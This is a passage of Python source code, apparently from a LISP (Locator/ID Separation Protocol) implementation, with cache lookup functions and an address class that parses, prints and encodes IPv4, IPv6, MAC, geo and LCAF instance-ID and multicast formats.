for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
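#
# Minimal usage sketch for lisp_cache() (illustration only). Keys are built
# from (mask-length, instance-id + AFI + address) and stored entries are
# assumed to expose an 'eid' attribute for longest-match lookups:
#
#   cache = lisp_cache()
#   eid = lisp_address(LISP_AFI_IPV4, "10.0.0.0", 8, 0)
#   cache.add_cache(eid, entry)            # assumes entry.eid is eid
#   host = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 0)
#   cache.lookup_cache(host, False)        # longest match, returns entry
#   cache.lookup_cache(eid, True)          # exact match, returns entry
#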
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
    # There is a special case we have to deal with here. If there exists a
    # (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
    # more-specifics, this entry will not be returned if there is a more-
    # specific already cached. For instance, if a Map-Register was received
    # for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
    # 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
    # a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
    # matching the ams entry, it will match the more-specific entry and
    # return (*, 224.1.1.1/32). Since the source lookup will be performed
    # below and not find 2.2.2.2, what is returned is 224.1.1.1/32 and not
    # 224.0.0.0/4.
    #
    # So we will look at the returned entry and, if a source is not found,
    # check to see if the parent of the 224.1.1.1/32 entry matches the group
    # we are looking up. This, of course, is only done for longest-match
    # lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
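    #
    # The checks above correspond to the RFC 1918 blocks: 10.0.0.0/8,
    # 172.16.0.0/12 (second byte in 16-31), and 192.168.0.0/16 (0xc0a8).
    #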
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
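    #
    # Worked example for pack_address() above (illustration only): for IPv4
    # 10.0.0.1 the format is "I", so struct.pack("I", socket.htonl(
    # 0x0a000001)) yields the 4 bytes 0x0a 0x00 0x00 0x01 in network
    # byte-order.
    #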
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
            # There is a common IPv6 address input mistake that can occur.
            # The address ff::/8 (or an address ff::1) is actually encoded
            # with 0x00ff as the high-order 16-bits. The correct way to
            # specify the prefix is ff00::/8, but one would wonder why the
            # lower-order 0x00 bits are needed if a /8 is used. So to
            # summarize:
            #
            # Entering ff::/8 will give you the 0::/8 prefix.
            # Entering ff00::/8 is not the same as ff00::/16.
            #
            # Allow the user to specify ff::/8, which allows for placing the
            # byte in the high-order byte of the 128-bit quantity. Check for
            # a double-colon in the input string to detect the single byte
            # and then below byte-swap the first 2 bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
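    #
    # Worked example for zero_host_bits() above (illustration only): for
    # IPv4 10.1.1.1 with mask_len 24, mask is 0xffffff00 after the shift,
    # so the stored address becomes 10.1.1.0.
    #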
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
            #endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
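    #
    # Worked examples for is_more_specific() (illustration only), all in
    # instance-id 0: 10.1.0.0/16 is more-specific than 10.0.0.0/8 (True);
    # 10.0.0.0/8 is not more-specific than 10.1.0.0/16 (False, shorter
    # mask); and any prefix is more-specific than the ultimate-root [*].
    #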
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
        # Get AFI and source address. Validate that there is enough length
        # and that there are bytes remaining in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
